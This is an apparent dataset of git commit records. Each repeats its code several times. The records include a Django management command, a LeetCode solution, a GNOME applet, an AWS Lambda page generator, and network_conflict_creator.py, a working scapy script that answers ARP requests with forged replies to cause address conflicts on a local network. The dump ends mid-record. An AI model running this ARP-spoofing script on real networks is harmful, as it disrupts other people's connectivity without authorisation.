CHUNK_SIZE = 100
for i, docs in enumerate(chunked(iter_docs(db, get_doc_ids()), CHUNK_SIZE)):
print i * CHUNK_SIZE
db.bulk_save([Group.wrap(doc) for doc in docs])
|
Add management command to touch all group docsfrom django.core.management.base import LabelCommand
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.chunked import chunked
from corehq.apps.groups.models import Group
class Command(LabelCommand):
def handle(self, *args, **options):
db = Group.get_db()
def get_doc_ids():
for result in db.view(
'groups/all_groups',
reduce=False):
yield result['id']
CHUNK_SIZE = 100
for i, docs in enumerate(chunked(iter_docs(db, get_doc_ids()), CHUNK_SIZE)):
print i * CHUNK_SIZE
db.bulk_save([Group.wrap(doc) for doc in docs])
|
<commit_before><commit_msg>Add management command to touch all group docs<commit_after>from django.core.management.base import LabelCommand
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.chunked import chunked
from corehq.apps.groups.models import Group
class Command(LabelCommand):
def handle(self, *args, **options):
db = Group.get_db()
def get_doc_ids():
for result in db.view(
'groups/all_groups',
reduce=False):
yield result['id']
CHUNK_SIZE = 100
for i, docs in enumerate(chunked(iter_docs(db, get_doc_ids()), CHUNK_SIZE)):
print i * CHUNK_SIZE
db.bulk_save([Group.wrap(doc) for doc in docs])
|
|
7428906683d179de61537f68d63e7b44438d687d
|
network_conflict_creator.py
|
network_conflict_creator.py
|
#!/usr/bin/env python
from base import Base
from argparse import ArgumentParser
from sys import exit
from scapy.all import sniff, Ether, ARP, sendp
from logging import getLogger, ERROR
getLogger("scapy.runtime").setLevel(ERROR)
Base.check_user()
parser = ArgumentParser(description='DHCP Starvation attack script')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for send discover packets')
parser.add_argument('-p', '--packets', type=int, help='Number of packets (default: 100000)', default=100000)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
args = parser.parse_args()
_number_of_packets = int(args.packets)
_current_number_of_packets = 0
_current_network_interface = ""
if args.interface is None:
_current_network_interface = Base.netiface_selection()
else:
_current_network_interface = args.interface
_current_mac_address = Base.get_netiface_mac_address(_current_network_interface)
if _current_mac_address is None:
print "This network interface does not have mac address!"
exit(1)
_target_mac_address = None
if args.target_mac is not None:
_target_mac_address = args.target_mac
def send_arp_reply(request):
if request.haslayer(ARP):
print "ARP!"
global _current_number_of_packets
global _current_mac_address
if request[ARP].op == ARP.who_has and request[ARP].hwdst == "00:00:00:00:00:00":
sendp(Ether(dst=request[ARP].hwsrc) / ARP(hwdst=request[ARP].hwsrc,
psrc=request[ARP].psrc))
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
exit(0)
if __name__ == "__main__":
print "Sniffing interface: " + str(_current_network_interface)
if _target_mac_address is None:
sniff(filter="arp", prn=send_arp_reply, iface=_current_network_interface)
else:
sniff(lfilter=lambda d: d.src == _target_mac_address,
filter="arp", prn=send_arp_reply, iface=_current_network_interface)
|
Add network conflict creator script.
|
Add network conflict creator script.
|
Python
|
mit
|
Vladimir-Ivanov-Git/raw-packet,Vladimir-Ivanov-Git/raw-packet
|
Add network conflict creator script.
|
#!/usr/bin/env python
from base import Base
from argparse import ArgumentParser
from sys import exit
from scapy.all import sniff, Ether, ARP, sendp
from logging import getLogger, ERROR
getLogger("scapy.runtime").setLevel(ERROR)
Base.check_user()
parser = ArgumentParser(description='DHCP Starvation attack script')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for send discover packets')
parser.add_argument('-p', '--packets', type=int, help='Number of packets (default: 100000)', default=100000)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
args = parser.parse_args()
_number_of_packets = int(args.packets)
_current_number_of_packets = 0
_current_network_interface = ""
if args.interface is None:
_current_network_interface = Base.netiface_selection()
else:
_current_network_interface = args.interface
_current_mac_address = Base.get_netiface_mac_address(_current_network_interface)
if _current_mac_address is None:
print "This network interface does not have mac address!"
exit(1)
_target_mac_address = None
if args.target_mac is not None:
_target_mac_address = args.target_mac
def send_arp_reply(request):
if request.haslayer(ARP):
print "ARP!"
global _current_number_of_packets
global _current_mac_address
if request[ARP].op == ARP.who_has and request[ARP].hwdst == "00:00:00:00:00:00":
sendp(Ether(dst=request[ARP].hwsrc) / ARP(hwdst=request[ARP].hwsrc,
psrc=request[ARP].psrc))
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
exit(0)
if __name__ == "__main__":
print "Sniffing interface: " + str(_current_network_interface)
if _target_mac_address is None:
sniff(filter="arp", prn=send_arp_reply, iface=_current_network_interface)
else:
sniff(lfilter=lambda d: d.src == _target_mac_address,
filter="arp", prn=send_arp_reply, iface=_current_network_interface)
|
<commit_before><commit_msg>Add network conflict creator script.<commit_after>
|
#!/usr/bin/env python
from base import Base
from argparse import ArgumentParser
from sys import exit
from scapy.all import sniff, Ether, ARP, sendp
from logging import getLogger, ERROR
getLogger("scapy.runtime").setLevel(ERROR)
Base.check_user()
parser = ArgumentParser(description='DHCP Starvation attack script')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for send discover packets')
parser.add_argument('-p', '--packets', type=int, help='Number of packets (default: 100000)', default=100000)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
args = parser.parse_args()
_number_of_packets = int(args.packets)
_current_number_of_packets = 0
_current_network_interface = ""
if args.interface is None:
_current_network_interface = Base.netiface_selection()
else:
_current_network_interface = args.interface
_current_mac_address = Base.get_netiface_mac_address(_current_network_interface)
if _current_mac_address is None:
print "This network interface does not have mac address!"
exit(1)
_target_mac_address = None
if args.target_mac is not None:
_target_mac_address = args.target_mac
def send_arp_reply(request):
if request.haslayer(ARP):
print "ARP!"
global _current_number_of_packets
global _current_mac_address
if request[ARP].op == ARP.who_has and request[ARP].hwdst == "00:00:00:00:00:00":
sendp(Ether(dst=request[ARP].hwsrc) / ARP(hwdst=request[ARP].hwsrc,
psrc=request[ARP].psrc))
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
exit(0)
if __name__ == "__main__":
print "Sniffing interface: " + str(_current_network_interface)
if _target_mac_address is None:
sniff(filter="arp", prn=send_arp_reply, iface=_current_network_interface)
else:
sniff(lfilter=lambda d: d.src == _target_mac_address,
filter="arp", prn=send_arp_reply, iface=_current_network_interface)
|
Add network conflict creator script.#!/usr/bin/env python
from base import Base
from argparse import ArgumentParser
from sys import exit
from scapy.all import sniff, Ether, ARP, sendp
from logging import getLogger, ERROR
getLogger("scapy.runtime").setLevel(ERROR)
Base.check_user()
parser = ArgumentParser(description='DHCP Starvation attack script')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for send discover packets')
parser.add_argument('-p', '--packets', type=int, help='Number of packets (default: 100000)', default=100000)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
args = parser.parse_args()
_number_of_packets = int(args.packets)
_current_number_of_packets = 0
_current_network_interface = ""
if args.interface is None:
_current_network_interface = Base.netiface_selection()
else:
_current_network_interface = args.interface
_current_mac_address = Base.get_netiface_mac_address(_current_network_interface)
if _current_mac_address is None:
print "This network interface does not have mac address!"
exit(1)
_target_mac_address = None
if args.target_mac is not None:
_target_mac_address = args.target_mac
def send_arp_reply(request):
if request.haslayer(ARP):
print "ARP!"
global _current_number_of_packets
global _current_mac_address
if request[ARP].op == ARP.who_has and request[ARP].hwdst == "00:00:00:00:00:00":
sendp(Ether(dst=request[ARP].hwsrc) / ARP(hwdst=request[ARP].hwsrc,
psrc=request[ARP].psrc))
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
exit(0)
if __name__ == "__main__":
print "Sniffing interface: " + str(_current_network_interface)
if _target_mac_address is None:
sniff(filter="arp", prn=send_arp_reply, iface=_current_network_interface)
else:
sniff(lfilter=lambda d: d.src == _target_mac_address,
filter="arp", prn=send_arp_reply, iface=_current_network_interface)
|
<commit_before><commit_msg>Add network conflict creator script.<commit_after>#!/usr/bin/env python
from base import Base
from argparse import ArgumentParser
from sys import exit
from scapy.all import sniff, Ether, ARP, sendp
from logging import getLogger, ERROR
getLogger("scapy.runtime").setLevel(ERROR)
Base.check_user()
parser = ArgumentParser(description='DHCP Starvation attack script')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for send discover packets')
parser.add_argument('-p', '--packets', type=int, help='Number of packets (default: 100000)', default=100000)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
args = parser.parse_args()
_number_of_packets = int(args.packets)
_current_number_of_packets = 0
_current_network_interface = ""
if args.interface is None:
_current_network_interface = Base.netiface_selection()
else:
_current_network_interface = args.interface
_current_mac_address = Base.get_netiface_mac_address(_current_network_interface)
if _current_mac_address is None:
print "This network interface does not have mac address!"
exit(1)
_target_mac_address = None
if args.target_mac is not None:
_target_mac_address = args.target_mac
def send_arp_reply(request):
if request.haslayer(ARP):
print "ARP!"
global _current_number_of_packets
global _current_mac_address
if request[ARP].op == ARP.who_has and request[ARP].hwdst == "00:00:00:00:00:00":
sendp(Ether(dst=request[ARP].hwsrc) / ARP(hwdst=request[ARP].hwsrc,
psrc=request[ARP].psrc))
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
exit(0)
if __name__ == "__main__":
print "Sniffing interface: " + str(_current_network_interface)
if _target_mac_address is None:
sniff(filter="arp", prn=send_arp_reply, iface=_current_network_interface)
else:
sniff(lfilter=lambda d: d.src == _target_mac_address,
filter="arp", prn=send_arp_reply, iface=_current_network_interface)
|
|
3a696d6646d2000997632aa2df15a254209977da
|
py/sliding-window-median.py
|
py/sliding-window-median.py
|
import heapq
from collections import Counter
class Solution(object):
def insertElement(self, value):
if self.minHeapSize < self.maxHeapSize:
heapq.heappush(self.maxHeap, -value)
m = self.maxHeapPop()
heapq.heappush(self.minHeap, m)
self.minHeapSize += 1
else:
heapq.heappush(self.minHeap, value)
m = self.minHeapPop()
heapq.heappush(self.maxHeap, -m)
self.maxHeapSize += 1
def minHeapPop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return heapq.heappop(self.minHeap)
def maxHeapPop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -heapq.heappop(self.maxHeap)
def minHeapTop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return self.minHeap[0]
def maxHeapTop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -self.maxHeap[0]
def windowMedian(self):
if self.maxHeapSize < self.minHeapSize:
return float(self.minHeapTop())
elif self.maxHeapSize > self.minHeapSize:
return float(self.maxHeapTop())
else:
return (self.minHeapTop() + self.maxHeapTop()) / 2.
def removeFromHeaps(self, value):
if self.minHeapSize > 0 and self.minHeapTop() <= value:
self.minRemoved[value] += 1
self.minHeapSize -= 1
else:
self.maxRemoved[value] += 1
self.maxHeapSize -= 1
def medianSlidingWindow(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[float]
"""
self.minHeap, self.maxHeap = [], []
self.minHeapSize, self.maxHeapSize = 0, 0
self.minRemoved = Counter()
self.maxRemoved = Counter()
slidingWindow = []
for i in xrange(k - 1):
self.insertElement(nums[i])
for i in xrange(k - 1, len(nums)):
self.insertElement(nums[i])
slidingWindow.append(self.windowMedian())
self.removeFromHeaps(nums[i - k + 1])
return slidingWindow
|
Add py solution for Sliding Window Median
|
Add py solution for Sliding Window Median
480. Sliding Window Median: https://leetcode.com/problems/sliding-window-median/
|
Python
|
apache-2.0
|
ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode
|
Add py solution for Sliding Window Median
480. Sliding Window Median: https://leetcode.com/problems/sliding-window-median/
|
import heapq
from collections import Counter
class Solution(object):
def insertElement(self, value):
if self.minHeapSize < self.maxHeapSize:
heapq.heappush(self.maxHeap, -value)
m = self.maxHeapPop()
heapq.heappush(self.minHeap, m)
self.minHeapSize += 1
else:
heapq.heappush(self.minHeap, value)
m = self.minHeapPop()
heapq.heappush(self.maxHeap, -m)
self.maxHeapSize += 1
def minHeapPop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return heapq.heappop(self.minHeap)
def maxHeapPop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -heapq.heappop(self.maxHeap)
def minHeapTop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return self.minHeap[0]
def maxHeapTop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -self.maxHeap[0]
def windowMedian(self):
if self.maxHeapSize < self.minHeapSize:
return float(self.minHeapTop())
elif self.maxHeapSize > self.minHeapSize:
return float(self.maxHeapTop())
else:
return (self.minHeapTop() + self.maxHeapTop()) / 2.
def removeFromHeaps(self, value):
if self.minHeapSize > 0 and self.minHeapTop() <= value:
self.minRemoved[value] += 1
self.minHeapSize -= 1
else:
self.maxRemoved[value] += 1
self.maxHeapSize -= 1
def medianSlidingWindow(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[float]
"""
self.minHeap, self.maxHeap = [], []
self.minHeapSize, self.maxHeapSize = 0, 0
self.minRemoved = Counter()
self.maxRemoved = Counter()
slidingWindow = []
for i in xrange(k - 1):
self.insertElement(nums[i])
for i in xrange(k - 1, len(nums)):
self.insertElement(nums[i])
slidingWindow.append(self.windowMedian())
self.removeFromHeaps(nums[i - k + 1])
return slidingWindow
|
<commit_before><commit_msg>Add py solution for Sliding Window Median
480. Sliding Window Median: https://leetcode.com/problems/sliding-window-median/<commit_after>
|
import heapq
from collections import Counter
class Solution(object):
def insertElement(self, value):
if self.minHeapSize < self.maxHeapSize:
heapq.heappush(self.maxHeap, -value)
m = self.maxHeapPop()
heapq.heappush(self.minHeap, m)
self.minHeapSize += 1
else:
heapq.heappush(self.minHeap, value)
m = self.minHeapPop()
heapq.heappush(self.maxHeap, -m)
self.maxHeapSize += 1
def minHeapPop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return heapq.heappop(self.minHeap)
def maxHeapPop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -heapq.heappop(self.maxHeap)
def minHeapTop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return self.minHeap[0]
def maxHeapTop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -self.maxHeap[0]
def windowMedian(self):
if self.maxHeapSize < self.minHeapSize:
return float(self.minHeapTop())
elif self.maxHeapSize > self.minHeapSize:
return float(self.maxHeapTop())
else:
return (self.minHeapTop() + self.maxHeapTop()) / 2.
def removeFromHeaps(self, value):
if self.minHeapSize > 0 and self.minHeapTop() <= value:
self.minRemoved[value] += 1
self.minHeapSize -= 1
else:
self.maxRemoved[value] += 1
self.maxHeapSize -= 1
def medianSlidingWindow(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[float]
"""
self.minHeap, self.maxHeap = [], []
self.minHeapSize, self.maxHeapSize = 0, 0
self.minRemoved = Counter()
self.maxRemoved = Counter()
slidingWindow = []
for i in xrange(k - 1):
self.insertElement(nums[i])
for i in xrange(k - 1, len(nums)):
self.insertElement(nums[i])
slidingWindow.append(self.windowMedian())
self.removeFromHeaps(nums[i - k + 1])
return slidingWindow
|
Add py solution for Sliding Window Median
480. Sliding Window Median: https://leetcode.com/problems/sliding-window-median/import heapq
from collections import Counter
class Solution(object):
def insertElement(self, value):
if self.minHeapSize < self.maxHeapSize:
heapq.heappush(self.maxHeap, -value)
m = self.maxHeapPop()
heapq.heappush(self.minHeap, m)
self.minHeapSize += 1
else:
heapq.heappush(self.minHeap, value)
m = self.minHeapPop()
heapq.heappush(self.maxHeap, -m)
self.maxHeapSize += 1
def minHeapPop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return heapq.heappop(self.minHeap)
def maxHeapPop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -heapq.heappop(self.maxHeap)
def minHeapTop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return self.minHeap[0]
def maxHeapTop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -self.maxHeap[0]
def windowMedian(self):
if self.maxHeapSize < self.minHeapSize:
return float(self.minHeapTop())
elif self.maxHeapSize > self.minHeapSize:
return float(self.maxHeapTop())
else:
return (self.minHeapTop() + self.maxHeapTop()) / 2.
def removeFromHeaps(self, value):
if self.minHeapSize > 0 and self.minHeapTop() <= value:
self.minRemoved[value] += 1
self.minHeapSize -= 1
else:
self.maxRemoved[value] += 1
self.maxHeapSize -= 1
def medianSlidingWindow(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[float]
"""
self.minHeap, self.maxHeap = [], []
self.minHeapSize, self.maxHeapSize = 0, 0
self.minRemoved = Counter()
self.maxRemoved = Counter()
slidingWindow = []
for i in xrange(k - 1):
self.insertElement(nums[i])
for i in xrange(k - 1, len(nums)):
self.insertElement(nums[i])
slidingWindow.append(self.windowMedian())
self.removeFromHeaps(nums[i - k + 1])
return slidingWindow
|
<commit_before><commit_msg>Add py solution for Sliding Window Median
480. Sliding Window Median: https://leetcode.com/problems/sliding-window-median/<commit_after>import heapq
from collections import Counter
class Solution(object):
def insertElement(self, value):
if self.minHeapSize < self.maxHeapSize:
heapq.heappush(self.maxHeap, -value)
m = self.maxHeapPop()
heapq.heappush(self.minHeap, m)
self.minHeapSize += 1
else:
heapq.heappush(self.minHeap, value)
m = self.minHeapPop()
heapq.heappush(self.maxHeap, -m)
self.maxHeapSize += 1
def minHeapPop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return heapq.heappop(self.minHeap)
def maxHeapPop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -heapq.heappop(self.maxHeap)
def minHeapTop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return self.minHeap[0]
def maxHeapTop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -self.maxHeap[0]
def windowMedian(self):
if self.maxHeapSize < self.minHeapSize:
return float(self.minHeapTop())
elif self.maxHeapSize > self.minHeapSize:
return float(self.maxHeapTop())
else:
return (self.minHeapTop() + self.maxHeapTop()) / 2.
def removeFromHeaps(self, value):
if self.minHeapSize > 0 and self.minHeapTop() <= value:
self.minRemoved[value] += 1
self.minHeapSize -= 1
else:
self.maxRemoved[value] += 1
self.maxHeapSize -= 1
def medianSlidingWindow(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[float]
"""
self.minHeap, self.maxHeap = [], []
self.minHeapSize, self.maxHeapSize = 0, 0
self.minRemoved = Counter()
self.maxRemoved = Counter()
slidingWindow = []
for i in xrange(k - 1):
self.insertElement(nums[i])
for i in xrange(k - 1, len(nums)):
self.insertElement(nums[i])
slidingWindow.append(self.windowMedian())
self.removeFromHeaps(nums[i - k + 1])
return slidingWindow
|
|
5ad4d9e38a7f5c86a499dfad9c6abef2d3697e7e
|
libpanel-applet/test-dbus-applet.py
|
libpanel-applet/test-dbus-applet.py
|
#!/usr/bin/env python
from gi.repository import Gtk
from gi.repository import PanelApplet
def applet_fill(applet):
label = Gtk.Label("My applet in Python")
applet.add(label)
applet.show_all()
def applet_factory(applet, iid, data):
if iid != "TestApplet":
return False
applet_fill(applet)
return True
PanelApplet.Applet.factory_main("TestAppletFactory",
PanelApplet.Applet.__gtype__,
applet_factory, None)
|
Add test applet in python
|
libpanel-applet: Add test applet in python
This is an example of how to use libpanel-applet from introspection
data.
|
Python
|
lgpl-2.1
|
GNOME/gnome-panel,GNOME/gnome-panel
|
libpanel-applet: Add test applet in python
This is an example of how to use libpanel-applet from introspection
data.
|
#!/usr/bin/env python
from gi.repository import Gtk
from gi.repository import PanelApplet
def applet_fill(applet):
label = Gtk.Label("My applet in Python")
applet.add(label)
applet.show_all()
def applet_factory(applet, iid, data):
if iid != "TestApplet":
return False
applet_fill(applet)
return True
PanelApplet.Applet.factory_main("TestAppletFactory",
PanelApplet.Applet.__gtype__,
applet_factory, None)
|
<commit_before><commit_msg>libpanel-applet: Add test applet in python
This is an example of how to use libpanel-applet from introspection
data.<commit_after>
|
#!/usr/bin/env python
from gi.repository import Gtk
from gi.repository import PanelApplet
def applet_fill(applet):
label = Gtk.Label("My applet in Python")
applet.add(label)
applet.show_all()
def applet_factory(applet, iid, data):
if iid != "TestApplet":
return False
applet_fill(applet)
return True
PanelApplet.Applet.factory_main("TestAppletFactory",
PanelApplet.Applet.__gtype__,
applet_factory, None)
|
libpanel-applet: Add test applet in python
This is an example of how to use libpanel-applet from introspection
data.#!/usr/bin/env python
from gi.repository import Gtk
from gi.repository import PanelApplet
def applet_fill(applet):
label = Gtk.Label("My applet in Python")
applet.add(label)
applet.show_all()
def applet_factory(applet, iid, data):
if iid != "TestApplet":
return False
applet_fill(applet)
return True
PanelApplet.Applet.factory_main("TestAppletFactory",
PanelApplet.Applet.__gtype__,
applet_factory, None)
|
<commit_before><commit_msg>libpanel-applet: Add test applet in python
This is an example of how to use libpanel-applet from introspection
data.<commit_after>#!/usr/bin/env python
from gi.repository import Gtk
from gi.repository import PanelApplet
def applet_fill(applet):
label = Gtk.Label("My applet in Python")
applet.add(label)
applet.show_all()
def applet_factory(applet, iid, data):
if iid != "TestApplet":
return False
applet_fill(applet)
return True
PanelApplet.Applet.factory_main("TestAppletFactory",
PanelApplet.Applet.__gtype__,
applet_factory, None)
|
|
6187f8ac6cf1637b160b47bba55113490f5abf20
|
Python/lambda_awejob.py
|
Python/lambda_awejob.py
|
# coding: utf-8
import json
import urllib.request
import boto3
def lambda_handler(event, context):
with urllib.request.urlopen("https://api.github.com/repos/awesome-jobs/vietnam/issues") as resp: # NOQA
data = resp.read()
d = json.loads(data.decode())
# ff = open('/tmp/issues')
# d = json.load(ff)
# ff.close()
JOBFORMAT = '''<li {style}>{date} <a href="{url}">{title}</a> - {salary}</li>\n''' # NOQA
with open('/tmp/index.html', 'w') as f:
f.write('<html><body>\n')
f.write('<h1>Awesome Jobboard</h1>\n')
f.write('<ul>\n')
for job in d:
title, url = job['title'], job['html_url']
style = 'style="color:gold"' if 'python' in title.lower() else ''
lines = list(filter(None, job['body'].splitlines()))
try:
salary = lines[
lines.index('## Salary Expectation')+1
].strip(' *')
except (IndexError, ValueError):
salary = 'UNKNOWN'
date = job['created_at']
date = date[:date.index('T')]
f.write(JOBFORMAT.format(url=url, title=title,
salary=salary, date=date,
style=style))
f.write('</ul>\n')
f.write('A <a href="https://pymi.vn">PYMIVN</a> toy product\n')
f.write('</body></html>\n')
s3 = boto3.resource('s3')
bucket = s3.Bucket('aj.pymi.vn')
bucket.put_object(ACL='public-read',
Bucket='aj.pymi.vn',
Key='index.html',
Body=open('/tmp/index.html').read().encode(),
ContentType='text/html; charset=utf-8'
)
|
Add lambda code for gen site from awesome job repo
|
Add lambda code for gen site from awesome job repo
http://www.familug.org/2017/08/serverless.html
|
Python
|
bsd-2-clause
|
familug/FAMILUG,familug/FAMILUG,familug/FAMILUG,familug/FAMILUG,familug/FAMILUG,familug/FAMILUG,familug/FAMILUG,familug/FAMILUG
|
Add lambda code for gen site from awesome job repo
http://www.familug.org/2017/08/serverless.html
|
# coding: utf-8
import json
import urllib.request
import boto3
def lambda_handler(event, context):
with urllib.request.urlopen("https://api.github.com/repos/awesome-jobs/vietnam/issues") as resp: # NOQA
data = resp.read()
d = json.loads(data.decode())
# ff = open('/tmp/issues')
# d = json.load(ff)
# ff.close()
JOBFORMAT = '''<li {style}>{date} <a href="{url}">{title}</a> - {salary}</li>\n''' # NOQA
with open('/tmp/index.html', 'w') as f:
f.write('<html><body>\n')
f.write('<h1>Awesome Jobboard</h1>\n')
f.write('<ul>\n')
for job in d:
title, url = job['title'], job['html_url']
style = 'style="color:gold"' if 'python' in title.lower() else ''
lines = list(filter(None, job['body'].splitlines()))
try:
salary = lines[
lines.index('## Salary Expectation')+1
].strip(' *')
except (IndexError, ValueError):
salary = 'UNKNOWN'
date = job['created_at']
date = date[:date.index('T')]
f.write(JOBFORMAT.format(url=url, title=title,
salary=salary, date=date,
style=style))
f.write('</ul>\n')
f.write('A <a href="https://pymi.vn">PYMIVN</a> toy product\n')
f.write('</body></html>\n')
s3 = boto3.resource('s3')
bucket = s3.Bucket('aj.pymi.vn')
bucket.put_object(ACL='public-read',
Bucket='aj.pymi.vn',
Key='index.html',
Body=open('/tmp/index.html').read().encode(),
ContentType='text/html; charset=utf-8'
)
|
<commit_before><commit_msg>Add lambda code for gen site from awesome job repo
http://www.familug.org/2017/08/serverless.html<commit_after>
|
# coding: utf-8
import json
import urllib.request
import boto3
def lambda_handler(event, context):
with urllib.request.urlopen("https://api.github.com/repos/awesome-jobs/vietnam/issues") as resp: # NOQA
data = resp.read()
d = json.loads(data.decode())
# ff = open('/tmp/issues')
# d = json.load(ff)
# ff.close()
JOBFORMAT = '''<li {style}>{date} <a href="{url}">{title}</a> - {salary}</li>\n''' # NOQA
with open('/tmp/index.html', 'w') as f:
f.write('<html><body>\n')
f.write('<h1>Awesome Jobboard</h1>\n')
f.write('<ul>\n')
for job in d:
title, url = job['title'], job['html_url']
style = 'style="color:gold"' if 'python' in title.lower() else ''
lines = list(filter(None, job['body'].splitlines()))
try:
salary = lines[
lines.index('## Salary Expectation')+1
].strip(' *')
except (IndexError, ValueError):
salary = 'UNKNOWN'
date = job['created_at']
date = date[:date.index('T')]
f.write(JOBFORMAT.format(url=url, title=title,
salary=salary, date=date,
style=style))
f.write('</ul>\n')
f.write('A <a href="https://pymi.vn">PYMIVN</a> toy product\n')
f.write('</body></html>\n')
s3 = boto3.resource('s3')
bucket = s3.Bucket('aj.pymi.vn')
bucket.put_object(ACL='public-read',
Bucket='aj.pymi.vn',
Key='index.html',
Body=open('/tmp/index.html').read().encode(),
ContentType='text/html; charset=utf-8'
)
|
Add lambda code for gen site from awesome job repo
http://www.familug.org/2017/08/serverless.html# coding: utf-8
import json
import urllib.request
import boto3
def lambda_handler(event, context):
with urllib.request.urlopen("https://api.github.com/repos/awesome-jobs/vietnam/issues") as resp: # NOQA
data = resp.read()
d = json.loads(data.decode())
# ff = open('/tmp/issues')
# d = json.load(ff)
# ff.close()
JOBFORMAT = '''<li {style}>{date} <a href="{url}">{title}</a> - {salary}</li>\n''' # NOQA
with open('/tmp/index.html', 'w') as f:
f.write('<html><body>\n')
f.write('<h1>Awesome Jobboard</h1>\n')
f.write('<ul>\n')
for job in d:
title, url = job['title'], job['html_url']
style = 'style="color:gold"' if 'python' in title.lower() else ''
lines = list(filter(None, job['body'].splitlines()))
try:
salary = lines[
lines.index('## Salary Expectation')+1
].strip(' *')
except (IndexError, ValueError):
salary = 'UNKNOWN'
date = job['created_at']
date = date[:date.index('T')]
f.write(JOBFORMAT.format(url=url, title=title,
salary=salary, date=date,
style=style))
f.write('</ul>\n')
f.write('A <a href="https://pymi.vn">PYMIVN</a> toy product\n')
f.write('</body></html>\n')
s3 = boto3.resource('s3')
bucket = s3.Bucket('aj.pymi.vn')
bucket.put_object(ACL='public-read',
Bucket='aj.pymi.vn',
Key='index.html',
Body=open('/tmp/index.html').read().encode(),
ContentType='text/html; charset=utf-8'
)
|
<commit_before><commit_msg>Add lambda code for gen site from awesome job repo
http://www.familug.org/2017/08/serverless.html<commit_after># coding: utf-8
import json
import urllib.request
import boto3
def lambda_handler(event, context):
with urllib.request.urlopen("https://api.github.com/repos/awesome-jobs/vietnam/issues") as resp: # NOQA
data = resp.read()
d = json.loads(data.decode())
# ff = open('/tmp/issues')
# d = json.load(ff)
# ff.close()
JOBFORMAT = '''<li {style}>{date} <a href="{url}">{title}</a> - {salary}</li>\n''' # NOQA
with open('/tmp/index.html', 'w') as f:
f.write('<html><body>\n')
f.write('<h1>Awesome Jobboard</h1>\n')
f.write('<ul>\n')
for job in d:
title, url = job['title'], job['html_url']
style = 'style="color:gold"' if 'python' in title.lower() else ''
lines = list(filter(None, job['body'].splitlines()))
try:
salary = lines[
lines.index('## Salary Expectation')+1
].strip(' *')
except (IndexError, ValueError):
salary = 'UNKNOWN'
date = job['created_at']
date = date[:date.index('T')]
f.write(JOBFORMAT.format(url=url, title=title,
salary=salary, date=date,
style=style))
f.write('</ul>\n')
f.write('A <a href="https://pymi.vn">PYMIVN</a> toy product\n')
f.write('</body></html>\n')
s3 = boto3.resource('s3')
bucket = s3.Bucket('aj.pymi.vn')
bucket.put_object(ACL='public-read',
Bucket='aj.pymi.vn',
Key='index.html',
Body=open('/tmp/index.html').read().encode(),
ContentType='text/html; charset=utf-8'
)
|
|
135021ff2c64d2bd8e1122f657228e5eb8826196
|
genome_designer/debug/2015_03_02_get_histo_files.py
|
